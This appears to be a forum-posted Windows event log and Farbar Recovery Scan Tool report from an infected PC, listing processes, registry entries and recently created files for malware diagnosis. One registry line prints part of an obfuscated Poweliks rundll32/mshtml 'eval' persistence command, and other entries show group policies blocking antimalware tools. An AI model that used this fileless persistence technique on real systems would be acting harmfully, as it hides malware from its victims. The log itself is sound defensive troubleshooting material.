Error: (11/07/2014 09:03:44 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: UpdateFlashPlayer_e32eb32e.exe1.0.0.1002539d7a76unknown0.0.0.000000000c000000500004542a3801cffaf837e06f50C:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_e32eb32e.exeunknown77465910-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: UpdateFlashPlayer_7accf934.exe1.0.0.1002539d7a76unknown0.0.0.000000000c00000050000454237dc01cffaf82be7882aC:\Users\Jack\AppData\Local\Temp\UpdateFlashPlayer_7accf934.exeunknown6ba61a86-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: msiexec.exe3.8.0.2545c8b63msiexec.exe3.8.0.2545c8b63c0000005000012df21c001cffaf8291c02b9C:\Windows\Installer\{5614A1ED-47E3-4A6C-B1D0-6AC0FAD1B844}\msiexec.exeC:\Windows\Installer\{5614A1ED-47E3-4A6C-B1D0-6AC0FAD1B844}\msiexec.exe6a05f8fe-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: msiexec.exe1.0.0.1002545d1e98unknown0.0.0.000000000c000000500020919189401cffaf82a9560b7C:\Windows\Installer\{3C781D98-1D70-4980-9877-1CD49325396C}\msiexec.exeunknown69e3072b-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 09:03:22 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: msiexec.exe3.8.0.2545c8b63msiexec.exe3.8.0.2545c8b63c0000005000012df261401cffaf829a42077C:\Windows\Installer\{2E04477B-8D51-4737-AAC9-03CBDE666401}\msiexec.exeC:\Windows\Installer\{2E04477B-8D51-4737-AAC9-03CBDE666401}\msiexec.exe69e55124-66eb-11e4-9459-001e4f99a790

Error: (11/07/2014 04:45:16 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (11/07/2014 01:21:54 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: iexplore.exe11.0.9600.17344541b6f63igdumd32.dll8.14.10.19304aba746bc000000500004ff81c8801cffa1fd8f641beC:\Program Files\Internet Explorer\iexplore.exeC:\Windows\system32\igdumd32.dll5dd4497c-6646-11e4-945c-001e4f99a790

Error: (11/06/2014 07:09:24 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

==================== Memory info ===========================

Processor: Intel® Core™2 CPU 6300 @ 1.86GHz
Percentage of memory in use: 39%
Total physical RAM: 3061.61 MB
Available physical RAM: 1840.61 MB
Total Pagefile: 6121.52 MB
Available Pagefile: 4462.23 MB
Total Virtual: 2047.88 MB
Available Virtual: 1895.42 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:698.44 GB) (Free:656.83 GB) NTFS
Drive d: (HP DJ1510) (CDROM) (Total:0.37 GB) (Free:0 GB) CDFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 698.6 GB) (Disk ID: 03A5ED43)
Partition 1: (Active) - (Size=200 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=698.4 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 

***********

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 08-11-2014 01
Ran by Jack (administrator) on JACK-PC on 08-11-2014 12:43:03
Running from C:\Users\Jack\Downloads
Loaded Profile: Jack (Available profiles: Jack)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Hewlett-Packard Company) C:\Program Files\HP\Common\HPSupportSolutionsFrameworkService.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
() C:\Windows\Installer\{F9005E4A-3F66-4B93-9604-53209B03D6F7}\msiexec.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MpCmdRun.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [] => [X]
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
Winlogon\Notify\acikmao: C:\Users\Jack\AppData\Local\acikmao.dll ()
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4825880 2014-10-23] (Piriform Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-10-13] (Glarysoft Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\MountPoints2: {c7920a94-4cb4-11e3-aa4c-806e6f6e6963} - D:\Setup.exe
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BootExecute: autocheck autochk * 
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://xfinity.comcast.net/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://www.msn.com/?ocid=iehp
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xD81BF7C5FEE9CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Old Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
SearchScopes: HKCU - {4AA1010B-C099-473B-B519-B51807026EBF} URL = http://search.yahoo.com/search?p={searchTerms}&b={startPage?}&fr=ie8
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{F5CFB83D-4674-45F5-B64D-C75316FE2D3F}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8

FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-25]
CHR Extension: (Google Drive) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-25]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-13]
CHR Extension: (YouTube) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-25]
CHR Extension: (Google Search) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-25]
CHR Extension: (Google Wallet) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-25]
CHR Extension: (Gmail) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-25]
CHR Extension: (example) - C:\Users\Jack\AppData\LocalLow\{7E81B18D-641B-869C-E732-8442672D77EF}\Jirixam\spufwgyyfmgt [2014-10-30]

========================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [47416 2014-02-05] (Hewlett-Packard Company)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17344 2014-10-25] (Glarysoft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
R1 MpKsl4d4a1af2; c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\MpKsl4d4a1af2.sys [39464 2014-11-08] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-08 12:43 - 2014-11-08 12:44 - 00000000 ____D () C:\Users\Jack\Downloads\CLEANUP
2014-11-08 12:43 - 2014-11-08 12:43 - 00007951 _____ () C:\Users\Jack\Downloads\FRST.txt
2014-11-08 12:42 - 2014-11-08 12:43 - 00000000 ____D () C:\FRST
2014-11-08 12:42 - 2014-11-08 12:42 - 01107968 _____ (Farbar) C:\Users\Jack\Downloads\FRST.exe
2014-11-07 21:02 - 2014-11-07 21:02 - 00023552 _____ () C:\Users\Jack\AppData\Local\acikmao.dll
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\UehaLwahi
2014-11-07 21:02 - 2014-11-07 21:02 - 00000000 ____D () C:\ProgramData\NeseVdol
2014-11-07 01:50 - 2014-11-07 01:50 - 00114904 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\2E8A529B.sys
2014-11-05 16:37 - 2014-11-05 16:37 - 00000000 ____D () C:\ProgramData\VenqIxjeh
2014-11-05 16:36 - 2014-11-05 16:36 - 00000000 ____D () C:\ProgramData\KupoqIkavk
2014-11-05 02:34 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Ismyihci
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\LukucOkjav
2014-11-05 02:33 - 2014-11-07 01:53 - 00000000 ____D () C:\ProgramData\CimhAyoj
2014-11-03 23:05 - 2014-11-05 10:32 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Waanypi
2014-11-03 23:04 - 2014-11-03 23:04 - 00000000 ____D () C:\ProgramData\FunhEmnol
2014-11-03 23:03 - 2014-11-03 23:03 - 00000144 _____ () C:\Windows\system32\1
2014-11-03 23:03 - 2014-11-03 23:03 - 00000000 ____D () C:\ProgramData\ZixvOfbax
2014-11-01 22:16 - 2014-11-07 04:43 - 00005458 _____ () C:\Windows\PFRO.log
2014-11-01 22:16 - 2014-11-07 04:43 - 00000224 _____ () C:\Windows\setupact.log
2014-11-01 22:16 - 2014-11-01 22:16 - 00000000 _____ () C:\Windows\setuperr.log
2014-11-01 21:08 - 2014-11-08 08:53 - 00031574 _____ () C:\Windows\WindowsUpdate.log
2014-11-01 01:16 - 2014-11-05 16:38 - 00000761 _____ () C:\Windows\system32\Drivers\etc\hosts.txt
2014-11-01 01:16 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\MuztOnba
2014-11-01 01:15 - 2014-11-01 22:15 - 00000000 ____D () C:\ProgramData\UabcIzedk
2014-10-31 22:46 - 2014-11-01 07:06 - 00000424 _____ () C:\ProgramData\@system.temp
2014-10-31 22:46 - 2014-11-01 07:06 - 00000160 ____H () C:\ProgramData\@system3.att
2014-10-31 22:45 - 2014-11-02 01:10 - 00000000 ___HD () C:\b11f30c
2014-10-31 22:45 - 2014-11-01 01:16 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\FrameworkUpdate7
2014-10-31 22:45 - 2014-10-31 22:45 - 00000448 ____H () C:\Users\Jack\AppData\Roaming\麽鎒駓覜
2014-10-30 21:12 - 2014-10-30 21:12 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-10-30 20:21 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Desktop\dds.com
2014-10-30 20:18 - 2014-10-30 20:25 - 00000770 _____ () C:\Users\Jack\Desktop\attach.txt
2014-10-30 20:12 - 2014-10-30 20:12 - 00688992 ____R (Swearware) C:\Users\Jack\Downloads\dds.com
2014-10-30 19:31 - 2014-10-30 21:16 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-10-30 19:23 - 2014-10-30 19:23 - 00001482 _____ () C:\Users\Jack\Desktop\MBAM 10-30.txt
2014-10-30 19:07 - 2014-10-30 20:00 - 00000000 ____D () C:\Users\Jack\Desktop\mbar
2014-10-29 08:01 - 2014-10-29 08:01 - 00000000 ____D () C:\Windows\Microsoft Antimalware
2014-10-27 02:04 - 2014-06-26 20:45 - 02285056 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2vdec.dll
2014-10-26 18:01 - 2014-10-29 09:02 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\Tyfyukbe
2014-10-26 14:47 - 2014-10-26 14:47 - 00000000 _____ () C:\Windows\system32\icsuwxe.dll
2014-10-26 04:12 - 2014-02-03 21:04 - 01230336 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2014-10-26 04:10 - 2013-11-23 13:26 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\WMPhoto.dll
2014-10-26 04:08 - 2014-09-18 19:44 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-26 04:08 - 2014-06-23 21:59 - 01987584 _____ (Microsoft Corporation) C:\Windows\system32\d3d10warp.dll
2014-10-26 04:08 - 2013-11-26 03:16 - 03419136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1.dll
2014-10-25 21:27 - 2014-10-25 21:33 - 00018973 _____ () C:\Users\Jack\Downloads\Result.txt
2014-10-25 21:17 - 2014-10-25 21:18 - 00002880 _____ () C:\Users\Jack\Downloads\FSS.txt
2014-10-25 20:48 - 2014-10-25 20:48 - 00854448 _____ () C:\Users\Jack\Desktop\SecurityCheck.exe
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieUserList
2014-10-25 12:45 - 2014-10-25 12:45 - 00000000 __SHD () C:\Users\Jack\AppData\Local\EmieSiteList
2014-10-25 12:32 - 2014-10-25 12:32 - 00000440 _____ () C:\Users\Jack\Documents\fixlist.txt
2014-10-25 12:17 - 2014-10-25 12:17 - 00000632 _____ () C:\Users\Jack\Desktop\JRT.txt
2014-10-25 11:49 - 2014-10-25 11:49 - 00000000 ____D () C:\Windows\ERUNT
2014-10-25 08:10 - 2014-10-25 08:10 - 17484800 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 11807232 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 04201472 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-25 08:10 - 2014-10-25 08:10 - 02187264 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 02017280 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-25 08:10 - 2014-10-25 08:10 - 01810944 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00677888 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00645120 _____ (Microsoft Corporation) C:\Windows\system32\jsIntl.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00616104 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dat
2014-10-25 08:10 - 2014-10-25 08:10 - 00610304 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00607744 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00337408 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2014-10-25 08:10 - 2014-10-25 08:10 - 00331448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00233472 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00208384 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00194048 _____ (Microsoft Corporation) C:\Windows\system32\elshyph.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00182272 _____ (Microsoft Corporation) C:\Windows\system32\msls31.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00151552 _____ (Microsoft Corporation) C:\Windows\system32\iexpress.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\wextract.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00127488 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00116736 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\IEAdvpack.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\iesysprep.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00083456 _____ (Microsoft Corporation) C:\Windows\system32\inseng.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00074240 _____ (Microsoft Corporation) C:\Windows\system32\SetIEInstalledDate.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00071680 _____ (Microsoft Corporation) C:\Windows\system32\RegisterIEPKEYs.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00069120 _____ (Microsoft Corporation) C:\Windows\system32\icardie.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\tdc.ocx
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00056832 _____ (Microsoft Corporation) C:\Windows\system32\pngfilt.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\mshtmler.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00036352 _____ (Microsoft Corporation) C:\Windows\system32\imgutil.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\licmgr10.dll
2014-10-25 08:10 - 2014-10-25 08:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2014-10-25 08:10 - 2014-10-25 08:10 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01247744 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01158144 _____ (Microsoft Corporation) C:\Windows\system32\XpsPrint.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 01080832 _____ (Microsoft Corporation) C:\Windows\system32\d3d10.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00906240 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00604160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10level9.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00364544 _____ (Microsoft Corporation) C:\Windows\system32\XpsGdiConverter.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00293376 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00249856 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00220160 _____ (Microsoft Corporation) C:\Windows\system32\d3d10core.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00207872 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecsExt.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00187392 _____ (Microsoft Corporation) C:\Windows\system32\UIAnimation.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\d3d10_1.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00010752 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00009728 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00005632 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-version-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll
2014-10-25 08:05 - 2014-10-25 08:05 - 00002560 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-downlevel-normaliz-l1-1-0.dll
2014-10-25 06:54 - 2014-10-25 06:54 - 00017344 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2014-10-25 06:54 - 2014-10-25 06:54 - 00001057 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00001045 _____ () C:\Users\Public\Desktop\Glary Utilities 5.lnk
2014-10-25 06:54 - 2014-10-25 06:54 - 00000318 _____ () C:\Windows\Tasks\GlaryInitialize 5.job
2014-10-25 06:54 - 2014-10-25 06:54 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2014-10-25 06:53 - 2014-11-06 22:25 - 00000000 ____D () C:\Program Files\Glary Utilities 5
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\GlarySoft
2014-10-25 06:53 - 2014-10-25 06:53 - 00000000 ____D () C:\Users\Jack\AppData\Roaming\DiskDefrag
2014-10-18 15:16 - 2014-10-18 15:16 - 00000464 __RSH () C:\ProgramData\ntuser.pol
2014-10-15 02:33 - 2014-10-09 20:44 - 00396288 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-10-15 02:33 - 2014-10-09 20:44 - 00230912 _____ (Microsoft Corporation) C:\Windows\system32\generaltel.dll
2014-10-15 02:33 - 2014-10-09 20:39 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-10-15 02:33 - 2014-09-28 19:41 - 02379264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-15 02:32 - 2014-09-17 20:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-15 02:32 - 2014-09-12 20:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-15 02:32 - 2014-09-04 00:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-15 02:32 - 2014-08-18 21:41 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
